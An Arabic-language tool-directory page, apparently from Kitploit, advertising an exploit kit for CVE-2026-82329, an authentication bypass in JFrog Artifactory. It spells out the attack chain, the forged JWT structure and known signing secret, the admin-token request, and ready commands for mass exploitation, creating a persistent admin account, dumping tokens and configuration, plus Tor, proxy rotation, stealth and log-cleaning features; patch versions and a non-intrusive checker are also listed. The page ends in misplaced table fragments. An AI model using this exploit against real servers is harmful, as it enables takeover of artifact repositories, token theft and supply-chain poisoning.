Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-82329-PoC-Exploit — مجموعة أدوات للاستغلال والكشف عن CVE-2026-82329، وهو تجاوز للمصادقة في JFrog Artifactory. تقوم بتزوير رموز JWT للانضمام لإصدار رموز المسؤول؛ وتتضمن أداة فحص إصدار غير تدخلية. | Kitploit
أدوات/GitHubGitHub/tc4dy/cve-2026-82329-poc-exploit
أدوات دفاعيةماسحات الثغرات الأمنيةتوليد الحمولةالاستغلالاستغلال تطبيقات الويبجمع المعلوماتالمحاكاة الافتراضية للأماناختبار الاختراقالمصادقة

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
الفريق الأحمر
GitHubtc4dy/cve-2026-82329-poc-exploit

CVE-2026-82329-PoC-Exploit

مجموعة أدوات للاستغلال والكشف عن CVE-2026-82329، وهو تجاوز للمصادقة في JFrog Artifactory. تقوم بتزوير رموز JWT للانضمام لإصدار رموز المسؤول؛ وتتضمن أداة فحص إصدار غير تدخلية.

عرض المستودع
منذ 10س 35دلم تتم المراجعة بعد
مشاركة

CVEPoC

CVE‑2026‑82329 – مجموعة أدوات تجاوز المصادقة في JFrog Artifactory

Python 3.8+ CVSS Author Artifactory

للاستخدام الأخلاقي فقط – اختبار أمني مصرح به
يوفر هذا المستودع أدوات لمتخصصي الأمن المصرح لهم، والفرق الزرقاء، ومختبري الاختراق فقط.
الوصول غير المصرح به إلى أنظمة الحاسوب غير قانوني بموجب CFAA (الولايات المتحدة)، وقانون إساءة استخدام الحاسوب (المملكة المتحدة)، وTCK 243/244 (تركيا)، وقوانين مماثلة في جميع أنحاء العالم.


📖 نظرة عامة على الثغرة

CVE‑2026‑82329 هي ثغرة تجاوز مصادقة حرجة في (الإصدارات حتى ) تسمح لمهاجم غير مصادق عليه بالحصول على عبر استغلال آلية الانضمام إلى عنقود JFrog Access.

JFrog Artifactory المستضاف ذاتيًا
7.111.x
7.161.x
رمز مسؤول كامل للمنصة

كيف تعمل

  1. الثقة بمفتاح انضمام فارغ – يثق JFrog Access بمفتاح انضمام وهمي قيمته سلسلة فارغة. وبالتالي فإن سر التوقيع الخاص به هو القيمة الحتمية 32 * 0x20 (مسافات).
  2. JWT انضمام مزور – يزور المهاجم JWT من نوع HS256 موقّعًا بهذا السر المعروف و kid = SHA256("").
  3. إصدار رمز SERVICE – يُرجع POST /access/api/v1/registry/join رمز SERVICE مع scp=admin دون أي مصادقة.
  4. تبادل رمز المسؤول – POST /access/api/v1/tokens مع scope=applied-permissions/admin&audience=* يمنح رمز مسؤول كامل للمنصة.
  5. التأثير – استيلاء كامل على المستودع، وسرقة الرموز، وإنشاء مستخدم مسؤول، وتسميم الحزم، وهجمات سلسلة التوريد، والتحرك الجانبي إلى الخدمات المتصلة (Xray، Mission Control، Distribution). قم بالترقية فورًا!

الإصدارات المتأثرة

  • 7.111.4 – 7.111.20 – معرّضة للثغرة
  • 7.117.0 – 7.117.27 – معرّضة للثغرة
  • 7.125.0 – 7.125.19 – معرّضة للثغرة
  • 7.133.0 – 7.133.28 – معرّضة للثغرة
  • 7.146.0 – 7.146.36 – معرّضة للثغرة
  • 7.161.0 – 7.161.19 – معرّضة للثغرة

الترقيع

  • قم بالترقية إلى 7.111.21، 7.117.28، 7.125.20، 7.133.29، 7.146.38، أو 7.161.20 أو أحدث.
  • إذا لم يكن الترقية ممكنة، قم بتقييد الوصول الشبكي إلى Artifactory (لا تعرضه أبدًا للإنترنت) وقم بتدوير جميع رموز المسؤول كحل مؤقت.

🧰 الأدوات

الأداةالغرضالمستخدم المستهدف
exploit.pyمجموعة أدوات مسلحة كاملة مع تزوير JWT، وتبادل رمز المسؤول، وإنشاء مستخدم مسؤول، والمسح الجماعي، ووضع التخفي، وتدوير الوكيل، وقائمة تفاعلية، وسلسلة هجوم كاملة.الفرق الحمراء / مختبري الاختراق المصرح لهم
safechecker.pyفاحص ثغرات غير تدخلي يكتشف إصدار Artifactory، ويتحقق من التعرض، ويقيّم المخاطر دون الحصول على أي رمز أو تنفيذ أي حمولة. يُنشئ تقارير JSON.الفرق الزرقاء / مدققو الأمن

📊 مقارنة الميزات

الميزةexploit.pysafechecker.py
اكتشاف الثغرة✅✅
اكتشاف الإصدار✅✅
JWT انضمام مزور✅❌
إصدار رمز الخدمة✅❌
تبادل رمز المسؤول✅❌
إنشاء مستخدم مسؤول✅❌
سرد المستودعات✅❌
سرد المستخدمين✅❌
تفريغ الإعدادات✅❌
تفريغ الرموز✅❌
سلسلة هجوم كاملة✅❌
قائمة تفاعلية✅❌
المسح الجماعي (متعدد الخيوط)✅✅
دعم الوكيل✅✅
تدوير الوكيل✅❌
دعم Tor (إخفاء الهوية)✅❌
تدوير User‑Agent (OPSEC)✅❌
Jitter (OPSEC)✅❌
محدد معدل تكيفي✅❌
وضع غير تدخلي (آمن)❌✅
تقرير الإصدار✅✅
فحص الوصول المجهول❌✅
تقرير JSON✅✅
تنظيف السجلات (مضاد للطب الشرعي)✅

🎯 ملخص حالات الاستخدام

السيناريوالأداة الموصى بها
الفريق الأزرق – التحقق مما إذا كان Artifactory الخاص بك معرّضًا للثغرةsafechecker.py
التدقيق الأمني – تقييم ثغرات غير تدخليsafechecker.py
الفريق الأحمر – اختبار اختراق مصرح به مع استغلال كاملexploit.py
Bug Bounty – اختبار الإفصاح المسؤولsafechecker.py
المسح الجماعي – فحص أهداف متعددة بحثًا عن الثغرةexploit.py (كشف فقط)
الاستجابة للحوادث – التحقق مما إذا كانت الأنظمة مخترقةsafechecker.py

⚙️ التثبيت

root@kitploit:~
git clone https://github.com/tc4dy/CVE-2026-82329-PoC-Exploit
cd CVE-2026-82329-PoC-Exploit
pip install -r requirements.txt

requirements.txt

root@kitploit:~
requests
urllib3
curl_cffi

📋 المعاملات

معاملات exploit.py

المعاملالوصف
-u, --urlعنوان URL لهدف Artifactory واحد (مثال: http://artifactory.example.com:8082)
-f, --fileملف يحتوي على قائمة الأهداف (واحد في كل سطر) للمسح الجماعي
--create-adminإنشاء مستخدم مسؤول دائم (التنسيق: USER:PASS)
--keep-adminالاحتفاظ بمستخدم المسؤول المنشأ (عدم التنظيف بعد المسح)
--token-onlyطباعة رمز المسؤول فقط (هدف واحد)
--interactiveقائمة تفاعلية بعد الاستغلال
--service-idمعرف الخدمة لـ JWT الانضمام (افتراضي: jfrt@01)
-t, --threadsعدد الخيوط للأهداف المتعددة (افتراضي: 10)
--timeoutمهلة الطلب (افتراضي: 25 ثانية)
--retryالحد الأقصى لإعادة المحاولات (افتراضي: 3)
--proxyوكيل HTTP/HTTPS (مثال: http://127.0.0.1:8080)
--proxy-listملف يحتوي على وكلاء للتدوير (واحد في كل سطر)
--jitterتأخير عشوائي (0‑2 ثانية) بين الطلبات
--stealthتمكين وضع التخفي (تدوير UA + X‑Forwarded‑For)
--curl-cffiاستخدام curl_cffi لانتحال بصمة TLS
--fullهجوم كامل: جميع الوحدات
--dump-configتفريغ إعدادات النظام
--dump-tokensتفريغ جميع رموز الوصول
--list-reposسرد المستودعات
--list-usersسرد المستخدمين
--detectالكشف فقط (بدون تبادل رمز المسؤول)
--exploit

معاملات safechecker.py

المعاملالوصف
-u, --urlعنوان URL لهدف Artifactory واحد (مثال: http://artifactory.example.com:8082)
-f, --fileملف يحتوي على قائمة الأهداف (واحد في كل سطر)
-t, --threadsعدد الخيوط للأهداف المتعددة (افتراضي: 5)
--timeoutمهلة الطلب (افتراضي: 10 ثوانٍ)
-v, --verboseإخراج مطوّل
-o, --outputحفظ تقرير JSON في ملف

💥 السيناريوهات

#السيناريوالأمر
1فحص سريع للثغرةpython safechecker.py -u http://artifactory.example.com:8082
2مسح مفصل مع تقريرpython safechecker.py -u http://artifactory.example.com:8082 -o report.json -v
3تدقيق جماعي من ملفpython safechecker.py -f targets.txt -t 10 -o audit.json
4استغلال كشف فقطpython exploit.py -u http://artifactory.example.com:8082 --detect
5الحصول على رمز المسؤول فقطpython exploit.py -u http://artifactory.example.com:8082 --token-only
6هجوم كامل مع قائمة تفاعليةpython exploit.py -u http://artifactory.example.com:8082 --interactive
7إنشاء مستخدم مسؤول دائمpython exploit.py -u http://artifactory.example.com:8082 --create-admin evil:P@ssw0rd1 --keep-admin
8تفريغ الإعداداتpython exploit.py -u http://artifactory.example.com:8082 --dump-config
9سرد المستودعات والمستخدمينpython exploit.py -u http://artifactory.example.com:8082 --list-repos --list-users
10استغلال جماعي مع التخفيpython exploit.py -f targets.txt -t 20 --stealth --jitter --full -o results.json
11تدوير الوكيل مع Torpython exploit.py -f targets.txt --proxy-list proxies.txt --curl-cffi --stealth

🧪 سلسلة نقاط النهاية والاستغلال

يستخدم الاستغلال نقاط نهاية JFrog والخطوات التالية:

الخطوةالطريقةنقطة النهايةالوصف
1. الانضمامPOST/access/api/v1/registry/joinJWT HS256 مزور → رمز SERVICE (scp=admin)
2. التبادلPOST/access/api/v1/tokensرمز SERVICE → رمز مسؤول المنصة
3. الإثباتGET/artifactory/api/system/configurationإثبات الوصول الخاص بالمسؤول فقط
4. الاستمراريةPUT/artifactory/api/security/users/{user}إنشاء مستخدم مسؤول دائم
5. الإبطالDELETE/access/api/v1/tokens/{id}تنظيف الرموز المنشأة

تنسيق الحمولة

root@kitploit:~
# Forged join JWT structure
{
  "alg": "HS256",
  "typ": "JWT"
}
{
  "iat": <unix_timestamp>,
  "service_id": "jfrt@01",
  "kid": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855",
  "skip_node_registration": true
}

# Signing secret
secret = b"\x20" * 32

# Admin token request
scope=applied-permissions/admin&audience=*&expires_in=0&refreshable=false

🛡️ الاستخدام المسؤول

  • استخدم هذه الأدوات فقط على الأنظمة التي تملكها أو لديك إذن كتابي صريح لاختبارها.
  • الوصول غير المصرح به غير قانوني وغير أخلاقي.
  • المؤلفون غير مسؤولين عن أي إساءة استخدام.
  • اتبع دائمًا قوانين ولوائح بلدك.

يُقدَّم هذا البرنامج لأغراض تعليمية واختبار أمني مصرح به فقط.

تنزيل الأداة
❌
User‑Agent مخصص✅✅
التحكم في التحقق من SSL✅✅
تنفيذ الاستغلال الكامل
-o, --outputحفظ تقرير JSON في ملف
-v, --verboseإخراج مطوّل
-q, --quietوضع صامت